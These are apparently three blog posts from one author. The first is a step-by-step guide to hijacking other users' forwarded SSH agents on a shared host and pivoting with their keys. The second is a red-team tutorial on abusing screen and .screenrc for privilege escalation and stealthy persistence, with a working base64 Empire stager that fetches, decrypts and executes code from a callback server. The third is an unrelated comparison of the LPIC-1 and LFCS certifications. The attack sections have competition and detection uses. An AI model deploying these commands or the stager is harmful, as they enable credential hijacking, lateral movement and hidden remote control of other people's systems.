Leverage SSH Agents to Move Across the Network

Accessing a production system in a Linux environment these days often requires a lot of ssh tunneling in order to get access to restricted systems. This is because it doesn’t make sense to publicly expose SSH to the internet or even your general-use, internal network. Instead there might be a bastion or jump box with ssh exposed as your initial way into the environment. Once connecting to the bastion host successfully you can then connect to another system within that restricted network or maybe even repeat the process to gain access to even more restricted hosts.

In order to handle authentication across multiple systems users leverage ssh agents. An SSH agent is effectively a helper program which stores unencrypted identity keys and credentials in memory. This allows for the SSH client to access these credentials via a Unix stream stock. The socket makes it so the end user doesn’t have to provide their credentials multiple times. The user can also request the SSH client retains access to the socket, when connecting to another system, by enabling agent-forwarding with the -A flag.

With SSH agent-forwarding enabled, the SSH client essentially creates a linked copy of the stream socket on the remote system. By default the socket is created in the /tmp directory in a folder named ssh-<10 random characters>, with the socket named agent.<agent pid>. The ssh agent folder is only granted privileges to the connecting user account. To see what agents are around on a given machine you can look through the /tmp directory with a command similar to:

ls /tmp -l | egrep 'ssh-.{10}$'

Finding SSH Agents

Since agent sockets are stored in /tmp and the reference to which agent to use is controled entirely by the value in the SSH_AUTH_SOCK environment variable. The root account, superusers, and possibly sudoers can change their environment variable to the socket of another connected user and effectively masquerade as them on the network. In fact you would even have accesses to any of the other keys the user added to the agent. Given you have access to a shared systems root account, you could use commands like the following to impersonate the user and view a list of registered keys.

ls /tmp| egrep 'ssh-.{10}$' # list the agent sockets that may be available
export SSH_AUTH_SOCK=/tmp/'ssh-.{10}$'/agent.<pid> # choose one and set appropriate values as you SSH_AUTH_SOCK environment variable
ssh-add -l # list all credentials available to the agent

The commands could even all be combined into a single loop like the one bellow. However, the ability to query and leverage the credentials is dependent on a stable connection from the target user. Stale agents can hang, because the socket cleanup process doesn’t necessarily happen once a session is closed.

for AGENT in $(ls /tmp| egrep 'ssh-.{10}$'); do export SSH_AUTH_SOCK=/tmp/$AGENT/$(ls /tmp/$AGENT);echo $AGENT $(stat -c '%U' /tmp/$AGENT);timeout 10 ssh-add -l;done;

Note: A lot of common programs like git, rsync, scp, etc also allow you yo leverage SSH agents. So if a given agent doesn’t get you access to another system, also be sure to try and use it to authenticate against common services.

Impersonating users and pivoting

Once you have an agent you want to leverage, just set it as the SSH_AUTH_SOCK environment variable. Then use it to try and log into other systems or services as the targeted user. Its also worth mentioning that you also be able to leverage the ssh agent and port forwarding to gain access to otherwise restricted system. I’ve created a somewhat related post about leveraging port forwarding in a previous post.

Always run commands like w or who to see where the user is connecting from. Then use that IP address to try and connect back to the users origin system. Most of the time, the users public key is added to their own systems authorized_keys file for ease of access.

This issue is most often seen in development environments, where users traditionally have elevated system access. These systems are also not as well defended or updated as often as production systems. That coupled with the fact that most of the time users don’t maintain account separation between development and production environments, makes it prime to leverage ssh agents.

Abusing screen and .screenrc to Escalate and Maintain Access

When it comes to playing the part of the hacker/red team in competitions like CCDC. I’m always looking for unique ways to gain and maintain access to systems. Lately I’ve toying with the idea of leveraging features in common administration tools instead of exploits or misconfigurations. My favorite of which is abusing screen and .screenrc features to establish a foothold.

Why screen?

The screen command is definitely something I think every Linux Administrator uses every day. The reason why is simple, its probably the best way to maintain your work or run longer jobs without the effort of creating a system service. This is because when the screen command issued it effective creates another terminal (TTY) independent of the current users session. So if the administrators session isn’t stable or its impractical to wait, the job won’t be affected.

Fun Fact: By default screens are actually allocated a TTY and spawned by the init process, not the current user. So the screen process, TTY, and child processes won’t show in user level process listings or the standard last, w, or who command outputs. Instead you can use the who command with the -a (all) option to also display TTYs spawned by init.

Abusing screen and .screenrc via abandoned screens

Given that the most common use case for the screen command is administrators running jobs that can’t be interrupted. Therefore it’s always worth checking to see if any screens are running when you compromise a users account. Its not that uncommon for administrators to elevate privileges or even switch users all together within a screen. If an administrator switches to root/superuser account in a screen, the screen still only allows the original spawning user access. If that’s a lower privilege user that you’ve compromised, its an easy privilege escalation case.

So you might be thinking that the administrator should have just used sudo to elevate privileges within the screen instead of switching to root/superuser. Its definitely a safer option, but not the best option because once a users password is entered for a sudo command, by default its not requested again for 15 minutes. So if you’re in the right screen at the right time, or willing to wait long enough, sudo can still be used as a means to privilege escalate as well.

You can check to see if the current user within a screen can sudo without prompt by running sudo in non-interactive mode and seeing if it errors out.

if sudo -n true 2>/dev/null; then echo "I can sudo"; else echo "I cannot sudo"; fi

Abusing screen and .screenrc via multi-user support

The alternative laid out by the developer of the screen tool is actually a rather detailed set of permissions and multi-user support for individual screens themselves. Going over the individual permissions that are available is probably out of the scope of this post. However multi-user support is actually used in cases where multi individuals need to access jobs running in a screen of a service account, but aren’t actually allowed superuser privileges.

For instances, in my consultant days we had external nmap scanning systems, all the consultants had access to scans running within screens, in case they needed to be modified or stopped. This allowed us to maintain access to all running jobs, but we weren’t required to have superuser access to switch users or elevate privileges to kill other users processes.

To use multi-user support, make sure the SUID bit is set on the screen executable and modify the individual users (~/.screenrc or global (/etc/screenrc) screenrc files. For example, if you wanted to try and maintain access to screens created by root via a compromised standard users named tester, you could include the following in /root/.screenrc file.

multiuser on
acladd tester

If screens are not being used enough to leverage changes to the .screenrc file. You can also modify one of the target users profile files to issue the screen command automatically. You can do this by adding ‘screen -RR’ to the users ~/.bashrc file or the global /etc/bashrc file. This will reattach to any existing screen or create a screen and attach to it, once login has completed.

Note: For highly secure environments its likely best to disable multi-user support in the global screenrc file. Also consider setting your global sudoers configure to timestamp_timeout=0, will require a password for every use of the sudo command. Change control and/or watchers on resource (~.*rc) and profile files might also help.

Abusing screen and .screenrc with stuff and clear

Maintaining Access with the stuff and clear technique

Leveraging multi-user support isn’t the only way of abusing screen and .screenrc to maintain access. Instead I now utilize a technique I call stuff and clear. In this technique the target users .screenrc file is modified to create a screen layer whenever a screen is executed. This arbitrary, named layer allows for the command “stuff” to send raw characters to the screen.

Luckily, the builtin printf command will handle the raw character encoding. So printf can type out shell code, send an return key press, type out the clear command, and send a final return key press. The stuff command will then effectively create the same screen pop effect that already happens when a new screen is created. So unless the user enters copy mode and scrolls up or errors occur, they are unlikely to notice.

Here is a code segment from a Empyre module I wrote for CCDC a few years ago, that does just as a described. It will write an Empyre shell to the users .screenrc file using the stuff and clear technique.

echo 'screen -t "python"' >> ~/.screenrc && printf "stuff \""'echo \\'"\"import sys,base64;exec(base64.b64decode(\\\'bU9WakhVPSdSSVRQYURSbFFwJwppbXBvcnQgc3lzLCB1cmxsaWIyO289X19pbXBvcnRfXyh7MjondXJsbGliMicsMzondXJsbGliLnJlcXVlc3QnfVtzeXMudmVyc2lvbl9pbmZvWzBdXSxmcm9tbGlzdD1bJ2J1aWxkX29wZW5lciddKS5idWlsZF9vcGVuZXIoKTtVQT0nSDNTRTIwUVlSRlZGWTFVOCc7by5hZGRoZWFkZXJzPVsoJ1VzZXItQWdlbnQnLFVBKV07YT1vLm9wZW4oJ2h0dHA6Ly8xMC4wLjAuMTAwOjgwODAvaW5kZXguYXNwJykucmVhZCgpO2tleT0nM2ViMDMwYzZhYjA5OWIwYTM1NTcxMmZlMzhkNTlmZmInO1MsaixvdXQ9cmFuZ2UoMjU2KSwwLFtdCmZvciBpIGluIHJhbmdlKDI1Nik6CiAgICBqPShqK1NbaV0rb3JkKGtleVtpJWxlbihrZXkpXSkpJTI1NgogICAgU1tpXSxTW2pdPVNbal0sU1tpXQppPWo9MApmb3IgY2hhciBpbiBhOgogICAgaT0oaSsxKSUyNTYKICAgIGo9KGorU1tpXSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCiAgICBvdXQuYXBwZW5kKGNocihvcmQoY2hhcileU1soU1tpXStTW2pdKSUyNTZdKSkKZXhlYygnJy5qb2luKG91dCkp\\\'));"'\\'"\" | python &\rclear\r"'"' >> ~/.screenrc

Fun Fact: Screen also supports not terminating windows when a screen is exited. This can be done by adding the ‘zombie kr’ line to the .screenrc file. In the case of some payload types, this would mean the shell process would still be running until an administrator killed the screen manually.

One Final Thought

Since I’m the current maintainer of linuxprivchecker, I’ve also taken the time to begin to make changes to help detect these opportunities related to abusing screen and .screenrc for privilege escalation. I hope to continue to add features to this tool and provide related blog posts like this one. These new features will likely sit in the unstable branch for some time before they make it to master. Any assistance with testing, feedback, or ideas is always welcome.

Linux Administration Certifications: LPIC 1 and LFCS

LPIC 1 and LFCS

TLDR; The LPIC 1 and LFCS certifications can both be used to validate your skills, however the LFCS provides a robust and uniquely hands-one, testing approach.

I recently passed the LPIC 1 (Linux Professional Institute Certified System Administrator) and LFCS (Linux Foundation Certified System Administrator) certification exams. I’m now planning to pursue the LPIC 2 and LFCE certifications this coming year. Several individuals have approached me interested in hearing more about my experiences and some of big differences between the LPIC 1 and LFCS. I’ll attempt to address those questions here and also share my opinions on the perceived value in the market place today.

Big Differences

The biggest differences between the LPIC 1 and LFCS certifications, definitely come down to the testing methods they each use. The LPIC 1 is a standard multiple choice style examination, with a few fill the blank questions. The LPIC features two exams with 50 knowledge base and practical application question, over one and half hours. The LFCS on the other hand, is a interactive practical applications exam. Wherein the tester is given 40 practical multi-step tasks, within an actual Linux terminal, with two hours to complete as many as possible.

Another major difference between the LPIC 1 and LFCS is how the testing is conducted. The two LPIC 1 exams are proctored by Pearson Vue, so they take place in your standard testing center. Since it’s a standard multiple choice exam, in a standard testing center, you will receive your test results right after completing the exam. You are scored based on whether or not you select the correct answers to the exam questions and the respective weight in each of the tested categories. The LFCS is a online exam which utilizes a web cam, a screen share, a task portal, and a live connection to a Linux system to conduct the exam. Throughout the exam you have terminal access to your own Linux virtual machine, to complete your various tasks.  The entire system is graded upon completion and delays receiving your final score. Thus your score is based on whether each step of the tasks and the tasks themselves are completed correctly. Its also rumored, that points lost on one task can be recovered on others based on the methods used, cleanliness, and overall efficiency.

Difficulty Level

The difficulty level of the LPIC 1 and LFCS is heavily debated, however I think it comes down to how you study and your experience within the Linux terminal. That being said, the LPIC 1 is largely a test of base knowledge, so if one puts forth the time and effort to review some of the coursework out there, they shouldn’t have any problem completing the exam. I honestly don’t believe your experience in the Linux terminal is going to help you out anyone more then one of the official books. The exam is all about knowing the command names and what they do. On the other hand, the LFCS exam, and its largely based on weather or not you can complete a business operations related task, in a timely manner. There is no official book for the LFCS exam, although there is online coursework which introduces you to commands and then provides lab activities for completion all on your own. Having completed all of the online course work, I believe its likely sufficient to pass the exam. However I think the real world Linux experience would be quite a bit more useful during the LFSC exam, simple because your being indirectly scored on timeliness and efficiency. Addtionally, on top of having to understand what the names of commands are and what they do, one also needs to understand how to effectively use each command to successfully pass the LFSC exam. Overall I would say the LFCS is going to be far more difficult for those newer to Linux, if only because of more intimidating structure of the exam and the review of ones efficiency.

Market Value

When it comes to the market value of the LPIC 1 and LFCS certifications, I think the total value depends on your individual goals. For instances, if your goal is to get your foot in the door at a large institution, I would recommend the LPIC 1 since it has been around longer and thus has a greater chance of being recognized by a recruiter or HR. The LPIC 1 is also going to be better if your goal is to continue on and become more specialized within the Linux space. If your goal is instead to provide validation of your skills and experience to a future or current employer I would highly recommend the LFCS. In addition to the certification being run by the Linux Foundation themselves, they now have a partnership with Microsoft. This new partnership creates a great opportunity for those working within more diverse environments, by allowing for canadits to take both Linux foundation and Microsoft certifications to become specialized in mix environments and/or cloud. Overall I think if your really trying to project your worth to the market, the LPIC 1 is a better bet, simply because its been around longer and currently has more recognize then LFCS. However, I’d bet the LFCS will soon take its place at the top, due to the growing relationships being fostered by the Linux Foundation.

Honorable Mentions

Although I have not attempted these exams, because they are distribution specific, the OCA (Oracle Certified Administrator) and the RHCSA (Red Hat Certified System Administrator) both seem to have more visibility in the market place. This is likely due to the huge brand recognition associated with these respective certifications. If your already employed with an organization that mostly utilizes either of these distributions, they may provide more bang for your buck.